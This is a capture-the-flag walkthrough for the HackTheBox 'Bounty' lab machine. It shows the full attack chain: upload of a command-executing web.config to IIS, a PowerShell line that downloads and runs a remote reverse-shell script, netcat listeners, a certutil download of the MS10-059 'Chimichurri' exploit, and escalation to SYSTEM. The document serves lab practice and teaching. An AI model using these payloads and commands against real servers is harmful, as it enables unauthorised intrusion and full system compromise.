hackthebox bounty walkthrough

Starting with nmap

# nmap -sC -sV -oA bounty
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-19 10:09 EDT
Nmap scan report for
Host is up (0.17s latency).
Not shown: 999 filtered ports
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.46 seconds

port 80 shows just a picture named merlin.jpg. Possibly a user in the box.

hackthebox – bounty -merlin

Doing gobuster and scanning with .aspx extension we get two things of interest.

First transfer.aspx where we can upload files and second UploadedFiles where we get to access the files we uploaded.

hackthebox = bounty – transfer

Doing enumeration, we find that we can only upload image files and .config file. Searching in Google for exploitation using .config file, we find this link. It demonstrated how we can use web.config file to run commands.

The content of web.config is as follows

<?xml version="1.0" encoding="UTF-8"?>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
<remove fileExtension=".config" />
<remove segment="web.config" />
Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD ")

We have to replace PAYLOAD with the command that we want to run. We use powershell to get a shell here. Replace PAYLOAD with following command

powershell -c iex(New-Object Net.WebClient).DownloadString('');

where is local IP address and shell .ps1 is a copy of Invoke-PowerShellTcp.ps1 which can be found in nishang GitHub repo.

Set up a web server

# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ...

Then upload web.config file and access it through, you will get a shell

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49160
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami

For user.txt you need to run following command

C:\Users\merlin\Desktop>attrib *.* -h -s /s /d

For priv esac we will first get the system information by running sysinfo command and then use windows exploit suggestor

# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /opt/Windows-Exploit-Suggester/2019-07-17-mssb.xls  --systeminfo ~/htb/bounty/sysinfo.txt 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

We use MS10-059. Download the binary from here. Put this in the same directory from where we have served web. I have renamed it to ms59.exe. Download it in remote machine using certutil.

PS C:\users\public> PS C:\users\public> certutil.exe -urlcache -split -f "" ms59.exe

****  Online  ****
  000000  ...
CertUtil: -URLCache command completed successfully.
PS C:\users\public> PS C:\users\public> dir

    Directory: C:\users\public

Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d-r--         7/14/2009   8:06 AM            Documents                         
d-r--         7/14/2009   7:57 AM            Downloads                         
d-r--         7/14/2009   7:57 AM            Music                             
d-r--         7/14/2009   7:57 AM            Pictures                          
d-r--         7/14/2009   7:57 AM            Videos                            
-a---         7/20/2019   6:46 AM     784384 ms59.exe                          

Run the exe to get a shell. Do not forget to listen on the port

# nc -lvnp 5555
PS C:\users\public> ./ms59.exe	
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
PS C:\users\public> ./ms59.exe 5555

At last

# nc -lvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

Leave a Reply

Your email address will not be published. Required fields are marked *